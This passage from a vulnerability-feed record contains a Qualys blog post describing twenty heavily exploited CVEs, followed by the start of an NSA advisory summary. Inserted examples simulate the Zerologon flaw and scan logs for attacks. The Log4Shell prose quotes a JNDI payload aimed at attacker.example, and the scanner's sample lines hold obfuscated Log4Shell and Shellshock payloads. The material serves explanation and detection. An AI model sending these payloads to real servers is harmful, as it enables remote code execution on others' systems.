dataset.\n\nIf successfully exploited, an attacker could execute arbitrary code in the current user's security context, potentially taking control of the system. Exploitation involves a user opening or previewing a maliciously crafted file, often sent via email. Microsoft addressed this vulnerability by correcting how Office and WordPad parse these files and by enabling certain API functionality in Windows.\n\n### 3\\. 
**CVE-2012-0158: Vulnerability in Windows Common Controls Could Allow RCE**\n\n**Vulnerability Trending Over Years: 2013, 2020, 2021, 2023 (33 times)**\n\nIt was exploited by 63 Malware, 45 Threat Actors, and 2 Ransomware and was trending in the wild as recently as August 31, 2023.\n\n**Qualys Vulnerability Detection (QID): 90793**\n\nCVE-2012-0158 is a remote code execution vulnerability in the Windows Common Controls ActiveX library (MSCOMCTL.OCX), which ships with Office and several other Microsoft products. An attacker can exploit the flaw with a specially crafted webpage or, far more commonly in the wild, with an RTF or Office document that embeds the vulnerable control. Upon viewing the page or opening the document, the attacker gains code execution with the same rights as the logged-on user. \n\nIf the user has administrative privileges, this could mean total control of the affected system. Disclosed in 2012, this vulnerability has been exploited for years in targeted attacks, enabling attackers to install programs, manipulate data, or create new accounts with full user rights.\n\n### 4\\. **CVE-2017-8570: Microsoft Office Remote Code Execution Vulnerability**\n\n**Vulnerability Trending Over Years: 2018, 2020, 2023 (25 times)**\n\nIt was exploited by 52 Malware and 11 Threat Actors and was trending in the wild as recently as September 2, 2023.\n\n**Qualys Vulnerability Detection (QID): 110300**\n\nCVE-2017-8570 is a remote code execution vulnerability in Microsoft Office and WordPad in the way these applications handle specially crafted files. It can be exploited by an attacker who convinces a user to open a specially designed file, allowing the attacker to run arbitrary code on the victim's machine with the same privileges as the logged-in user; in practice it typically serves as a downloader for other high-profile malware.\n\n### 5\\. 
**CVE-2020-1472: Zerologon - An Unauthenticated Privilege Escalation to Full Domain Privileges**\n\n**Vulnerability Trending Over Years: 2020, 2021, 2022, 2023 (56 times)**\n\nIt was exploited by 18 Malware, 16 Threat Actors, and 11 Ransomware and was trending in the wild as recently as September 4, 2023.\n\n**Qualys Vulnerability Detection (QID):** **91680**\n\n**In the "Additional Routinely Exploited Vulnerabilities in 2022" list, published by CISA earlier.**\n\nCVE-2020-1472, or **Zerologon, is a critical vulnerability in Microsoft's Netlogon Remote Protocol (MS-NRPC)** caused by the way it uses AES-CFB8: the credential computation encrypts the 8-byte challenge with an initialization vector fixed to all zeros.\n\nWith a zero IV and an all-zero client challenge, the resulting credential is itself all zeros for roughly one in 256 session keys, so an attacker who keeps sending zero-filled challenges and credentials (and opts out of RPC signing and sealing, which the protocol allowed) authenticates as any machine account, including the domain controller itself, after a few hundred attempts on average. The attacker can then reset the domain controller's machine account password and take control of all Active Directory identity services.\n\n### 6\\. **CVE-2017-0144, CVE-2017-0145, CVE-2017-0143: Windows SMBv1 Remote Code Execution Vulnerability (WannaCry, Petya)**\n\n**Vulnerability Trending Over Years: 2017, 2020, 2021, 2023 (50 times)**\n\nIt was exploited by 12 Malware, 10 Threat Actors, and 12 Ransomware and was trending in the wild as recently as September 1, 2023.\n\n**Qualys Vulnerability Detection (QID): 91361, 91360, 91359, 91345**\n\nPatched in MS17-010 and made public through the Shadow Brokers leak of the ETERNALBLUE, ETERNALSYNERGY and ETERNALROMANCE exploits, these are remote code execution vulnerabilities in Microsoft's Server Message Block 1.0 (SMBv1) protocol.\n\nThe vulnerabilities arise from how SMBv1 handles specific requests, allowing an unauthenticated attacker to send specially crafted packets to an SMBv1 server (TCP port 445) and execute code on it with kernel-level (SYSTEM) privileges.\n\nThey were infamously exploited in the widespread WannaCry ransomware attack in 2017, and shortly afterwards by NotPetya, leading to global data encryption and ransom demands.
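The Zerologon entry (item 5 above) says the flaw is a fixed IV in AES-CFB8; the script below, an added example and not Qualys or Microsoft code, shows why that is fatal. It implements textbook CFB-8, fixes the IV to zero as Netlogon did, and measures how often an all-zero credential is accepted for a random session key. Assumptions: AES is replaced by a keyed SHA-256 stand-in so the script runs without third-party packages (the property depends only on the zero IV, not on the cipher), and session keys are generated locally rather than negotiated with a domain controller.

```python
"""Zerologon (CVE-2020-1472) in miniature: AES-CFB8 with a fixed all-zero IV lets a
client forge a valid Netlogon credential without knowing the session key.

Added example for this post, not Qualys or Microsoft code. Assumption: AES is
replaced by a keyed SHA-256 stand-in so the script runs without third-party
packages; the CFB8 weakness shown here depends only on the IV being zero, not on
which block cipher sits underneath.
"""
import hashlib
import random

BLOCK = 16                  # AES block size in bytes
ZERO_IV = bytes(BLOCK)      # Netlogon hard-coded the IV to sixteen zero bytes
ZERO_CHALLENGE = bytes(8)   # attacker-chosen all-zero client challenge
ZERO_CREDENTIAL = bytes(8)  # the credential the attacker claims to have computed


def block_encrypt(key: bytes, block: bytes) -> bytes:
    """Stand-in block cipher (assumption, see module docstring): 16 bytes of keyed
    SHA-256. Any cipher whose output bytes look uniformly random behaves the same."""
    return hashlib.sha256(key + block).digest()[:BLOCK]


def cfb8_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """Textbook CFB-8: encrypt the shift register, XOR its first output byte with one
    plaintext byte, then shift that ciphertext byte into the register."""
    register = bytearray(iv)
    out = bytearray()
    for p in plaintext:
        c = block_encrypt(key, bytes(register))[0] ^ p
        out.append(c)
        register = register[1:] + bytes([c])
    return bytes(out)


def compute_netlogon_credential(session_key: bytes, challenge: bytes) -> bytes:
    """MS-NRPC ComputeNetlogonCredential (AES flavour): CFB8 over the 8-byte
    challenge with the IV fixed to zero, which is the defect behind Zerologon."""
    return cfb8_encrypt(session_key, ZERO_IV, challenge)


def server_accepts_zero_credential(session_key: bytes) -> bool:
    """Attacker sends a zero challenge and claims the credential is eight zero bytes.
    With a zero IV and zero plaintext the register only stays all-zero if the first
    keystream byte is 0, so this succeeds for about 1 in 256 session keys."""
    return compute_netlogon_credential(session_key, ZERO_CHALLENGE) == ZERO_CREDENTIAL


def random_session_key(rng: random.Random) -> bytes:
    """Stand-in for the key the DC derives for each authentication attempt."""
    return rng.getrandbits(8 * BLOCK).to_bytes(BLOCK, "big")


def acceptance_rate(trials: int, seed: int) -> float:
    """Fraction of random session keys for which the zero credential is accepted;
    converges to 1/256 (about 0.0039)."""
    rng = random.Random(seed)
    hits = sum(server_accepts_zero_credential(random_session_key(rng)) for _ in range(trials))
    return hits / trials


def attempts_until_success(seed: int, max_attempts: int = 10_000) -> int:
    """Simulate the attack loop: every attempt gets a fresh session key and the
    attacker retries the all-zero credential until the server accepts it."""
    rng = random.Random(seed)
    for attempt in range(1, max_attempts + 1):
        if server_accepts_zero_credential(random_session_key(rng)):
            return attempt
    raise RuntimeError("no success within max_attempts; astronomically unlikely")


def zero_credential_accepted_with_iv(session_key: bytes, iv: bytes) -> bool:
    """Contrast only (not Microsoft's actual fix, which enforces signed and sealed
    Netlogon channels): with an unpredictable IV the attacker cannot keep the
    register at zero, so a zero credential is accepted with probability 2**-64."""
    return cfb8_encrypt(session_key, iv, ZERO_CHALLENGE) == ZERO_CREDENTIAL


if __name__ == "__main__":
    print("acceptance rate over 20000 random keys:", acceptance_rate(20_000, seed=1))
    print("attempts needed in one simulated attack:", attempts_until_success(seed=7))
```

Run it and the acceptance rate settles near 1/256; with a fresh session key per attempt the attack needs roughly 256 tries on average, which is why the public exploits simply loop a few thousand times. Microsoft's fix does not change the IV: it enforces signed and sealed Netlogon channels so a client can no longer opt out of integrity protection, which is what the attacker needs to get past authentication with a forged credential.

### 7\\. 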
**CVE-2012-1723: Java Applet Field Bytecode Verifier Cache Remote Code Execution**\n\n**Vulnerability Trending Over Years: 2023 (6 times)**\n\nIt was exploited by 91 Malware, 8 Threat Actors, and 41 Ransomware and was trending in the wild as recently as August 17, 2023.\n\n**Qualys Vulnerability Detection (QID): 120274**\n\nCVE-2012-1723 is a vulnerability in the Java Runtime Environment that can be exploited through a malicious web page hosting a rogue Java applet.\n\nThe issue, a type-confusion error in the "HotSpot" bytecode verifier's handling of field access, allows untrusted Java applets or applications to bypass the Java sandbox security restrictions and execute arbitrary code on a user's system.\n\n### 8\\. **CVE-2021-34473, CVE-2021-34523, CVE-2021-31207: Microsoft Exchange Server RCE (ProxyShell)**\n\n**Vulnerability Trending Over Years: 2021, 2022, 2023 (39 times)**\n\nIt was exploited by 12 Malware, 20 Threat Actors, and 12 Ransomware and was trending in the wild as recently as September 2, 2023.\n\n**Qualys Vulnerability Detection (QID): 50114, 50111, 50112**\n\n**In the "Top 12 Routinely Exploited Vulnerabilities in 2022" list, published by CISA earlier.**\n\nProxyShell is a chain of three vulnerabilities affecting on-premises Microsoft Exchange Server, which is widely used for email and associated services globally: CVE-2021-34473, a pre-authentication path confusion in the Autodiscover front end that yields server-side request forgery; CVE-2021-34523, a privilege elevation in the Exchange PowerShell back end; and CVE-2021-31207, a post-authentication arbitrary file write used to drop web shells.\n\nThese vulnerabilities exist in the Microsoft Client Access Service (CAS), typically running on port 443 in IIS and often exposed to the internet to allow users to access their email remotely. This exposure has led to widespread exploitation by threat actors deploying web shells to execute arbitrary code on compromised servers. Chained together, the three flaws allow an unauthenticated actor to bypass authentication and execute code as a privileged user.\n\n### 9\\. 
**CVE-2019-11510: Pulse Secure Pulse Connect Secure SSL VPN Unauthenticated Path Traversal / Arbitrary File Read**\n\n**Vulnerability Trending Over Years: 2019, 2020, 2023 (53 times)**\n\nIt was exploited by 13 Malware, 18 Threat Actors, and 12 Ransomware and was trending in the wild as recently as September 4, 2023.\n\n**Qualys Vulnerability Detection (QID): 38771**\n\n**In the "Additional Routinely Exploited Vulnerabilities in 2022" list, published by CISA earlier.**\n\nCVE-2019-11510 is a critical vulnerability found in Pulse Connect Secure, a widely used SSL VPN solution by Pulse Secure. The flaw enables an unauthenticated, remote attacker to exploit a specific endpoint with a path traversal sequence and read arbitrary files on the appliance, including sensitive information such as private keys, cached credentials, and active session data.\n\nWith those credentials or session cookies, an attacker gains the same access to the corporate network as a legitimate VPN user, which is why this file read is treated as critical rather than as a simple information disclosure.\n\n### 10\\. **CVE-2021-44228: Apache Log4j Remote Code Execution Vulnerability**\n\n**Vulnerability Trending Over Years: 2021, 2022, 2023 (77 times)**\n\nIt was exploited by 10 Malware, 26 Threat Actors, and 5 Ransomware and was trending in the wild as recently as September 4, 2023.\n\n**Qualys Vulnerability Detection (QID): 376157, 730297**\n\n**In the "Top 12 Routinely Exploited Vulnerabilities in 2022" list, published by CISA earlier.**\n\nCVE-2021-44228, or "Log4Shell," is a critical vulnerability in Apache's Log4j 2 Java logging library. The flaw abuses Log4j's message 'lookups' feature: when attacker-controlled input containing a string such as ${jndi:ldap://attacker.example/x} is logged, Log4j performs a JNDI lookup against the attacker's server, which returns a reference that makes the vulnerable application fetch and load a remote Java class, resulting in Remote Code Execution (RCE) on the server running the vulnerable Log4j instance.\n\nBecause almost any logged field can carry the payload (HTTP headers such as User-Agent, usernames, form fields, and values forwarded by upstream systems) and the lookup syntax can be nested and obfuscated, any Java application that logs untrusted input through an unpatched Log4j 2 is exposed.\n\n### 11\\. 
**CVE-2014-6271: Shellshock \u2013 Linux Bash Vulnerability**\n\n**Vulnerability Trending Over Years: 2014, 2016, 2017, 2020, 2021, 2022, 2023 (70 times)**\n\nIt was exploited by 18 Malware and 1 Threat Actor and was trending in the wild as recently as September 2, 2023.\n\n**Qualys Vulnerability Detection (QID): 122693, 13038, 150134**\n\nShellshock (CVE-2014-6271) is a critical vulnerability in GNU Bash that affects many Linux, Unix, and Mac OS systems. Bash passed shell functions to child processes through environment variables, and when it parsed such a variable it kept executing whatever followed the function definition. An attacker who can set an environment variable on the target, for example through an HTTP header that a web server hands to a CGI script, or through the SSH_ORIGINAL_COMMAND of a restricted SSH account, can therefore append commands that Bash runs on start-up, giving remote code execution. It has a high severity score because it affects a very wide range of devices and applications and risks unauthorized data access or service disruption.\n\n### 12\\. **CVE-2018-8174: Windows VBScript Engine Remote Code Execution Vulnerability**\n\n**Vulnerability Trending Over Years: 2018, 2020, 2023 (30 times)**\n\nIt was exploited by 21 Malware, 10 Threat Actors, and 7 Ransomware and was trending in the wild as recently as September 4, 2023.\n\n**Qualys Vulnerability Detection (QID): 91447**\n\nCVE-2018-8174 is a critical vulnerability in Microsoft Windows' VBScript Engine, enabling remote code execution. Triggered by viewing a malicious website with Internet Explorer or opening a rigged Microsoft Office document that loads the engine, this use-after-free flaw allows an attacker to manipulate memory objects and execute code.\n\nThe attacker can fully control the system if the user has administrative rights.
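Both Log4Shell (item 10) and Shellshock (item 11) arrive as a recognisable string in a field the server logs, so the natural first detection is a scan of access logs. The script below is an added example, not Qualys code: it normalises URL encoding and the `${lower:..}` / `${::-x}` lookup nesting that attackers use to evade a naive grep for `jndi`, then flags the Bash function-export prefix `() {` that Shellshock payloads start with. The log lines are constructed samples in Apache combined-log format with documentation-range addresses.

```python
"""Flag Log4Shell (CVE-2021-44228) and Shellshock (CVE-2014-6271) attempts in web
access logs, including the obfuscated Log4Shell forms that defeat a plain grep.

Added example for this post, not Qualys code. The log lines are constructed
samples in Apache combined-log format using documentation-range addresses.
"""
import re
import urllib.parse
from typing import List, Optional, Tuple

SAMPLE_LOG = [  # constructed, not real traffic
    '10.0.0.5 - - [10/Dec/2021:03:14:07 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:03:14:09 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.10:1389/a}"',
    '10.0.0.9 - - [10/Dec/2021:03:14:11 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}ndi:${lower:l}dap://203.0.113.10/x}"',
    '10.0.0.9 - - [10/Dec/2021:03:14:12 +0000] "GET /?q=%24%7Bjndi%3Armi%3A%2F%2F203.0.113.10%2Fa%7D HTTP/1.1" 404 0 "-" "curl/7.68.0"',
    '10.0.0.9 - - [10/Dec/2021:03:14:13 +0000] "GET / HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:${::-l}dap://203.0.113.10/z}"',
    '10.0.0.7 - - [25/Sep/2014:11:02:44 +0000] "GET /cgi-bin/status HTTP/1.1" 200 12 "-" "() { :; }; /bin/bash -c \'id\'"',
    '10.0.0.7 - - [25/Sep/2014:11:02:45 +0000] "GET /cgi-bin/status HTTP/1.1" 200 12 "() { _; } >_[$($())] { echo; }" "Mozilla/5.0"',
]

# ${lower:x} / ${upper:x} wrappers resolve to x; ${anything:-x} resolves to the default x.
_CASE_LOOKUP = re.compile(r"\$\{(?:lower|upper):([^{}]*)\}", re.IGNORECASE)
_DEFAULT_LOOKUP = re.compile(r"\$\{[^{}]*?:-([^{}]*)\}")
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)
# Bash function-export prefix that every Shellshock payload begins with.
_SHELLSHOCK = re.compile(r"\(\)\s*\{")


def normalize(text: str, max_rounds: int = 10) -> str:
    """Undo (possibly repeated) URL encoding, then peel nested Log4j lookups from the
    inside out until the string stops changing, so ${${lower:j}ndi:...} becomes ${jndi:...}."""
    for _ in range(max_rounds):
        decoded = urllib.parse.unquote(text)
        if decoded == text:
            break
        text = decoded
    for _ in range(max_rounds):
        peeled = _CASE_LOOKUP.sub(lambda m: m.group(1).lower(), text)
        peeled = _DEFAULT_LOOKUP.sub(r"\1", peeled)
        if peeled == text:
            break
        text = peeled
    return text


def classify(line: str) -> Optional[str]:
    """Return 'log4shell', 'shellshock', or None for a single log line."""
    text = normalize(line)
    if _JNDI.search(text):
        return "log4shell"
    if _SHELLSHOCK.search(text):
        return "shellshock"
    return None


def scan(lines: List[str]) -> List[Tuple[int, str]]:
    """(1-based line number, finding) for every line that matches an indicator."""
    findings = []
    for number, line in enumerate(lines, 1):
        verdict = classify(line)
        if verdict:
            findings.append((number, verdict))
    return findings


if __name__ == "__main__":
    for number, verdict in scan(SAMPLE_LOG):
        print("line %d: %s" % (number, verdict))
```

The `() {` indicator is deliberately broad; restrict it to the headers your CGI handlers actually export (User-Agent, Referer, Cookie) before alerting on it. For Log4Shell, a normalised match in any logged field is worth an alert even when the response was a 404, because the lookup fires when the line is logged, not when the request succeeds.

### 13\\. 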
**CVE-2013-0074: Microsoft Silverlight Could Allow Remote Code Execution**\n\n**Vulnerability Trending Over Years: 2023 (8 times)**\n\nIt was exploited by 62 Malware and 50 Ransomware and was trending in the wild as recently as August 20, 2023.\n\n**Qualys Vulnerability Detection (QID): 90870**\n\nCVE-2013-0074 is a remote code execution vulnerability in Microsoft Silverlight that permits a crafted Silverlight application to access memory unsafely, leading to the execution of arbitrary code under the current user\u2019s security context.\n\nIf the user has admin rights, the attacker can install programs, alter or delete data, or create new accounts with full privileges. The user is typically deceived into visiting a malicious website or clicking on a link, commonly through an email or instant message; exploit kits of the period used it for drive-by downloads.\n\n### 14\\. **CVE-2012-0507: Oracle Java SE Remote Java Runtime Environment Vulnerability**\n\n**Vulnerability Trending Over Years: 2023 (10 times)**\n\nIt was exploited by 66 Malware, 3 Threat Actors, and 42 Ransomware and was trending in the wild as recently as July 26, 2023.\n\n**Qualys Vulnerability Detection (QID): 119956**\n\nCVE-2012-0507 is a critical vulnerability in the Java Runtime Environment (JRE) allowing untrusted Java applets to execute arbitrary code outside the Java sandbox. Originating from a flaw in the AtomicReferenceArray class implementation (the class could be deserialized into a state that breaks type safety), **this vulnerability was exploited by the Flashback Trojan in 2012**, which led to one of the most significant known malware outbreaks on Apple devices. Attackers exploit this vulnerability by tricking users into visiting a malicious website hosting a Java applet.\n\n### 15\\. 
**CVE-2019-19781: Citrix ADC and Citrix Gateway - Remote Code Execution (RCE) Vulnerability**\n\n**Vulnerability Trending Over Years: 2020, 2022, 2023 (60 times)**\n\nIt was exploited by 11 Malware, 12 Threat Actors, and 10 Ransomware and was trending in the wild as recently as September 4, 2023.\n\n**Qualys Vulnerability Detection (QID): 372305, 150273**\n\n**In the "Additional Routinely Exploited Vulnerabilities in 2022" list, published by CISA earlier.**\n\nCVE-2019-19781, or "Shitrix," is a critical vulnerability in Citrix Application Delivery Controller (ADC) and Citrix Gateway that allows unauthenticated attackers to execute arbitrary code on the appliance and from there reach internal network resources.\n\nThe flaw resides in the VPN component of the affected products: a directory traversal in the /vpns/ path lets an unauthenticated request reach scripts that should require a session, giving attackers both read and write access to the underlying file system and, through a writable Perl template, code execution.\n\n### 16\\. **CVE-2018-0802: Microsoft Office Memory Corruption Vulnerability**\n\n**Vulnerability Trending Over Years: 2021, 2022, 2023 (19 times)**\n\nIt was exploited by 29 Malware and 24 Threat Actors and was trending in the wild as recently as September 2, 2023.\n\n**Qualys Vulnerability Detection (QID): 110310**\n\nCVE-2018-0802 is a critical vulnerability in the same Equation Editor component as CVE-2017-11882; Microsoft's November 2017 fix for that bug left a second overflow, which, if exploited, allows remote code execution via specially crafted files.\n\nAttackers can run arbitrary code in the current user's context, potentially taking over the system if the user holds administrative rights. This vulnerability was used in targeted attacks and was being actively exploited before Microsoft released a security update in January 2018 that correctly handles objects in memory, resolving the issue.\n\n### 17\\. 
**CVE-2021-26855: Microsoft Exchange Server Authentication Bypass (RCE)**\n\n**Vulnerability Trending Over Years:** **2021, 2023 (46 times)**\n\nIt was exploited by 19 Malware, 22 Threat Actors, and 9 Ransomware and was trending in the wild as recently as September 2, 2023.\n\n**Qualys Vulnerability Detection (QID): 50107, 50108**\n\n**In the "Additional Routinely Exploited Vulnerabilities in 2022" list, published by CISA earlier.**\n\nCVE-2021-26855, the entry point of the ProxyLogon exploit chain, is a server-side request forgery (SSRF) vulnerability in Microsoft Exchange Server that enables an unauthenticated attacker to bypass authentication and impersonate users.\n\nThe flaw allows arbitrary HTTP requests to be relayed to back-end services, granting access to users' mailboxes and enabling information theft; chained with CVE-2021-27065 it yields arbitrary file write and web shell deployment. It has been widely exploited by many threat actors, prompting emergency out-of-band patches from Microsoft in March 2021.\n\n### 18\\. **CVE-2019-2725: Oracle WebLogic Affected by Unauthenticated RCE Vulnerability**\n\n**Vulnerability Trending Over Years: 2019, 2020, 2022, 2023 (53 times)** \n\nIt was exploited by 10 Malware, 4 Threat Actors, and 9 Ransomware and was trending in the wild as recently as September 4, 2023.\n\n**Qualys Vulnerability Detection (QID): 150267, 87386** \n\nCVE-2019-2725 is a critical remote code execution vulnerability in Oracle WebLogic Server: an XMLDecoder deserialization flaw in the wls9_async_response and wls-wsat web service components that allows unauthenticated attackers to execute arbitrary code over a network without user interaction. It was weaponized within days to install cryptocurrency miners and ransomware.\n\n### 19\\. **CVE-2018-13379: Fortinet FortiGate (FortiOS) System File Leak through the SSL VPN Web Portal**\n\n**Vulnerability Trending Over Years: 2020, 2021, 2023 (41 times)** \n\nIt was exploited by 6 Malware, 13 Threat Actors, and 6 Ransomware and was trending in the wild as recently as August 30, 2023.\n\n**Qualys Vulnerability Detection (QID): 43702** \n\n**In the "Top 12 Routinely Exploited Vulnerabilities in 2022" list, published by CISA earlier. 
**\n\nCVE-2018-13379 is a path traversal vulnerability in the Fortinet FortiOS SSL VPN web portal. An unauthenticated attacker can read sensitive system files via specially crafted HTTP requests; in particular the exploit reads the SSL VPN session file, exposing usernames and plaintext passwords of logged-in users and allowing the attacker to log in as them.\n\n### 20\\. CVE-2021-26084: Atlassian Confluence Server Webwork OGNL Injection RCE Vulnerability\n\n**Vulnerability Trending Over Years: 2021, 2022, 2023 (35 times)**\n\nIt was exploited by 8 Malware, 6 Threat Actors, and 8 Ransomware and was trending in the wild as recently as September 2, 2023.\n\n**Qualys Vulnerability Detection (QID): 730172, 150368, 375839**\n\n**In the "Top 12 Routinely Exploited Vulnerabilities in 2022" list, published by CISA earlier.**\n\nCVE-2021-26084 is a critical vulnerability in Atlassian's Confluence Server and Data Center, specifically an OGNL injection in the Webwork framework's parameter handling. It enables an unauthenticated attacker to execute arbitrary code on a Confluence Server or Data Center instance, and it was used at scale to deploy cryptominers and web shells.\n\n## TruRisk Dashboard\n\nQualys VMDR gives organizations instant visibility into high-risk and top twenty vulnerabilities.\n\n[Fig 3. Qualys VMDR TruRisk Dashboard for Top 20 Vulnerabilities](<https://ik.imagekit.io/qualys/wp-content/uploads/2023/09/Blog-3.jpg>)\n\nThe **Qualys VMDR TruRisk Dashboard** gives organizations complete visibility into open vulnerabilities, focused on the organization\u2019s global risk score and its high-risk vulnerabilities. 
Once you identify the vulnerable assets for these top twenty CVEs prioritized among your remediation owners, you can use Qualys Patch management to instantly reduce the risk.\n\nThe TruRisk VMDR Dashboard is available \u2013 [Download the Dashboard Here](<https://blog.qualys.com/wp-content/uploads/2023/09/Qualys_VMDR_TruRisk__Dashboard.zip>)\n\n## Key Insights & Takeaways\n\n * In the current Vulnerability Threat Landscape, identifying open vulnerabilities and effective remediation is the highest priority for every defender.\n * Among the vast scale of the CVEs available, you need to know the weaponized high-risk vulnerabilities that are actively targeted by Threat Actors, Malware, and ransomware families.\n * Use multi-dimensional Threat Intelligence to prioritize vulnerabilities rather than implementing multiple siloed threat approaches.\n * The Qualys VMDR with TruRisk automatically prioritizes vulnerabilities exploited in the wild with a TruRisk score of 90 or higher, greatly simplifying the prioritization process.\n\n## References\n\n * [Part 1: An In-Depth Look at the Latest Vulnerability Threat Landscape](<https://blog.qualys.com/product-tech/2023/07/11/an-in-depth-look-at-the-latest-vulnerability-threat-landscape-part-1>)\n * [Part 2: An In-Depth Look at the Latest Vulnerability Threat Landscape (Attackers\u2019 Edition)](<https://blog.qualys.com/vulnerabilities-threat-research/2023/07/18/part-2-an-in-depth-look-at-the-latest-vulnerability-threat-landscape-attackers-edition>)\n\n## Additional Contributors\n\n * **Shreya Salvi, Data Scientist, Qualys**\n * **Saeed Abbasi, Product Manager, Vulnerability Research**", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": 
"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2023-09-04T14:00:00", "type": "qualysblog", "title": "Qualys Top 20 Most Exploited Vulnerabilities", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0158", "CVE-2012-0507", "CVE-2012-1723", "CVE-2013-0074", "CVE-2014-6271", "CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0199", "CVE-2017-11882", "CVE-2017-8570", "CVE-2018-0802", "CVE-2018-13379", "CVE-2018-8174", "CVE-2019-11510", "CVE-2019-19781", "CVE-2019-2725", "CVE-2020-1472", "CVE-2021-26084", "CVE-2021-26855", "CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-44228"], "modified": "2023-09-04T14:00:00", "id": "QUALYSBLOG:6AFD8E9AB405FBE460877D857273A9AF", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-12T20:01:11", "description": "On October 6, 2022, the United States National Security Agency (NSA) released a [cybersecurity advisory](<https://media.defense.gov/2022/Oct/06/2003092365/-1/-1/0/Joint_CSA_Top_CVEs_Exploited_by_PRC_cyber_actors_.PDF>) on the activity of cyber actors sponsored by the Chinese government, officially the People\u2019s Republic of China (PRC), in pursuit of its national interests. These malicious cyber activities attributed to the Chinese government have targeted, and continue to target, a mixture of industries and organizations in the United States. 
The advisory lists the top CVEs used since 2020 by PRC state-sponsored cyber actors, as assessed by the National Security Agency (NSA), Cybersecurity and Infrastructure Security Agency (CISA), and Federal Bureau of Investigation (FBI). The PRC actors continue to exploit known vulnerabilities to target U.S. and allied networks, as well as software and hardware companies, to steal intellectual property and develop access to sensitive networks. \n\nThe agencies describe PRC state-sponsored cyber activity as one of the most significant and dynamic threats to U.S. government and civilian networks. PRC state-sponsored cyber actors continue to target government and critical infrastructure networks with an increasing array of new and adaptive techniques, some of which could pose a considerable risk to the Information Technology Sector, telecommunications organizations, the Defense Industrial Base (DIB) Sector, and other critical infrastructure organizations. \n\nPRC state-sponsored cyber actors continue to exploit known vulnerabilities and use publicly available tools to target victims. 
Here is the list of 20 publicly known vulnerabilities (CVEs) published by the NSA, along with the affected products and the associated Qualys VMDR QID(s) for each vulnerability: \n\n**Vendor / Product**| **CVE**| **Vulnerability Type**| **Qualys QID(s)** \n---|---|---|--- \nApache Log4j | CVE-2021-44228 | Remote Code Execution | 730302, 150441, 150440, and more \nPulse Connect Secure | CVE-2019-11510 | Arbitrary File Read | 38771 \nGitLab CE/EE | CVE-2021-22205 | Remote Code Execution | 375475 \nAtlassian Confluence Server and Data Center | CVE-2022-26134 | Remote Code Execution | 730514, 376657, 150523 \nMicrosoft Exchange | CVE-2021-26855 | Remote Code Execution | 50107, 50108 \nF5 Big-IP | CVE-2020-5902 | Remote Code Execution | 38791, 373106 \nVMware vCenter Server | CVE-2021-22005 | Arbitrary File Upload | 216265, 216266 \nCitrix ADC | CVE-2019-19781 | Path Traversal | 372685, 150273, 372305 \nCisco Hyperflex | CVE-2021-1497 | Command Line Execution | 730070 \nBuffalo WSR | CVE-2021-20090 | Relative Path Traversal | NA \nAtlassian Confluence Server and Data Center | CVE-2021-26084 | Remote Code Execution | 150368, 375839, 730172 \nHikvision Webserver | CVE-2021-36260 | Command Injection | NA \nSitecore XP | CVE-2021-42237 | Remote Code Execution | 14012 \nF5 Big-IP | CVE-2022-1388 | Remote Code Execution | 150511, 730489, 376577 \nApache APISIX | CVE-2022-24112 | Authentication Bypass by Spoofing | 730361 \nZoho ManageEngine ADSelfService Plus | CVE-2021-40539 | Remote Code Execution | 375840 \nMicrosoft Exchange | CVE-2021-26857 | Remote Code Execution | 50107 \nMicrosoft Exchange | CVE-2021-26858 | Remote Code Execution | 50107 \nMicrosoft Exchange | CVE-2021-27065 | Remote Code Execution | 50107 \nApache HTTP Server | CVE-2021-41773 | Path Traversal | 150373, 150372, 710595 and more \nTable 1: Top CVEs most used by Chinese state-sponsored cyber actors since 2020 \n\nThe NSA notes that the threat actors use virtual private networks (VPNs) to obscure their activities and establish initial access. 
Multiple CVEs in Table 1 let the actors stealthily gain unauthorized access to sensitive networks, after which they work to establish persistence and move laterally to other internally connected networks. \n\nThe NSA highlights how the People\u2019s Republic of China (PRC) has targeted and compromised major telecommunications companies and network service providers, mostly by exploiting publicly known vulnerabilities. Affected networks have ranged from small office/home office (SOHO) routers to medium and large enterprise networks. \n\nPRC state-sponsored cyber actors readily exploit vulnerabilities to compromise unpatched network devices. Devices such as SOHO routers and Network Attached Storage (NAS) appliances serve as additional access points to route command and control (C2) traffic and as footholds from which to conduct intrusions into other entities. Cyber defenders, busy keeping pace with the frequent patching of Internet-facing services and endpoint devices, often overlook these devices. \n\n## Detect & Prioritize 20 Publicly Known Vulnerabilities using VMDR 2.0 \n\nQualys has released remote and authenticated QIDs for these commonly exploited vulnerabilities. 
